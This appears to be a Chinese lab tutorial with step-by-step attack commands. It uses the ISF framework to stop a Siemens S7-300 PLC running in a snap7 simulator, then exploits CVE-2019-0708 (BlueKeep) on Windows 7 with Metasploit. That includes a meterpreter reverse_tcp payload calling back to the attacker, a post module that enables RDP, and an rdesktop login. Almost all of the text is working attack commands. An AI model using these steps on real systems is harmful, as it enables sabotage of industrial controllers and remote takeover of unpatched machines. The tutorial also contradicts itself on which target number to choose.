一、西门子S7-300启停
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
2.kali中安装工控漏洞利用框架 ISF
(1)在kali终端中使用命令:
git clone https://github.com/dark-lbp/isf/
(2)输入cd isf
(3)这时有可能会报错:缺少nmap模块,方法:
A.克隆下载nmap模块的包
git clone https://github.com/johanlundberg/python-nmap
B.进入文件夹使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
D.继续执行 python2 isf.py命令进行安装
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示serverstarted
(4)clientdemo.exe界面上填写上物理机ip
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
4.打开ISF后,输入:
use exploits/plcs/siemens/s7_300_400_plc_control
5.show options;set target 物理机IP
6.run
这里显示 stop plc ,同时查看模拟器中的输出,可以发现已经停止
二、利用windows 7 cve-2019-0708漏洞
环境准备
说明:该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。
这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
3.若3389没打开,可以右键计算机,选择属性
4.选择远程设置
5.选择允许远程连接
7.5.2 利用windows 7 cve-2019-0708漏洞案例
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
nmap 192.168.11.133(win7IP)
2.确认开启后启动msfconsole
- 搜索漏洞:
search 0708
前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
5.设置目标:
set rhost 被攻击ip #设置win7ip
set rport 3389
6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
8.输入:show targets,显示可以选择的靶机的架构
9.用于vm是15.5.1,所以可以选择target 3-5
10.选择target 3,进行尝试:
set target 5
11.进行攻击,运行:run
12.假如可以建立连接,输入:
run post/windows/manage/enable_rdp
运行远程桌面模块
13.另开一个kali终端,输入:
rdesktop win7靶机IP